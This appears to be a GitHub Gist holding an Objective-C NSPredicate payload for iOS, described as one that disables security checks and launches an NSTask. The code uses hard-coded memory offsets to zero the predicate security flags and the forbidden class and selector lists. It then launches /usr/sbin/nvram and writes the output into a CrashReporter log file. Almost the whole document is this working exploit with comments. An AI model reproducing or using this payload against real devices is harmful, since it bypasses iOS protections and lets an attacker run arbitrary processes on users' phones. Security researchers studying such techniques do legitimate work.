Last active
December 30, 2023 06:26
-
-
Save aemmitt-ns/9176bb2b54256eaf69465c2b6bd182d5 to your computer and use it in GitHub Desktop.
NSPredicate payload for iOS that disables security checks and launches an NSTask
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging | |
| // use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way | |
| "$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue," | |
| "$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags | |
| "$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce | |
| "$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes | |
| "$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors | |
| "$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class | |
| "$NSPipe := $NSTask - 0x41a0," // address of NSPipe class | |
| "function(1, 'self'," // wrapper function so the undefined results dont cause crash | |
| "function(-1, 'getValue:', $_predicateSecurityOnce.nonretainedObjectValue)," // set _predicateSecurityOnce = -1, no checks | |
| "function( 0, 'getValue:', $_predicateSecurityFlags.nonretainedObjectValue)," // set _predicateSecurityFlags = 0, no exceptions | |
| "function( 0, 'getValue:', $forbiddenClassesLength.nonretainedObjectValue)," // set length of class name array to 0 | |
| "function( 0, 'getValue:', $forbiddenSelectorsLength.nonretainedObjectValue))," // set length of selector array to 0 | |
| "$dict := '<dict><key>_NSTaskExecutablePath</key><string>/usr/sbin/nvram</string>" // dict for NSTask | |
| "<key>_NSTaskArgumentArray</key><array><string>-p</string></array></dict>'.propertyList," | |
| // set _NSTaskOutputFileHandle to a pipe so we can get the output | |
| "function($dict, 'setObject:forKey:', $NSPipe.nonretainedObjectValue.pipe, '_NSTaskOutputFileHandle')," | |
| "$task := function($NSTask.nonretainedObjectValue, 'launchedTaskWithDictionary:', $dict)," // launch NSTask | |
| "function(1, 'self', $task.waitUntilExit, " // wrapper function so the undefined results dont cause crash | |
| "function($task.standardOutput.fileHandleForReading.availableData, 'writeToFile:atomically:'," // get output from NSTask | |
| "'/private/var/mobile/Library/Logs/CrashReporter/nvramahh.ips', nil))}, 'NSDate')"]; // write to crash log file |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment